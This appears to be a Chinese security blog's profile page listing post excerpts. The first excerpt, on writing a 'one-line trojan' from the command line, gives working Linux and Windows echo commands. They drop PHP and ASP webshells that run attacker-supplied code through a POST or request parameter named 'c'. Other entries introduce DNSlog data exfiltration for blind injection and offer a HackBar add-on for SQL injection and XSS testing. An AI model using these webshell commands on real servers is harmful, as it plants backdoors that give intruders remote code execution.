- 博客(2)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 CMD写一句话木马
linux: echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win: echo ^<%eval request("c")%^> >>webshell.cc.asp 会再同目录下生成webshell.cc.asp一句话 密码:c ...
2020-12-22 08:39:13
2982
1
原创 DNSlog注入浅谈
文章目录前言一、前提条件二、利用步骤1.注册一个域名2.数据库配置3.实际操作总结 前言 DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。 这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。 一、前提条件 1、SQL盲注、无回显的命令执行、无回显的SSRF ; 2、只能用.
2020-12-13 15:55:51
830
2020.12可用hackbar
2020年12月仍能正常使用的hackbar。Hackbar是一个Firefox的插件,它的功能类似于地址栏,但是它里面的数据不受服务器的相应触发的重定向等其它变化的影响.
有网址的载入于访问****,联合查询**,各种编码,数据加密功能.
这个Hackbar可以帮助你在测试SQL注入**,XSS漏洞和网站的安全性****,主要是帮助开发人员做代码的安全审计**,检查代码,寻找安全漏洞
2020-12-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人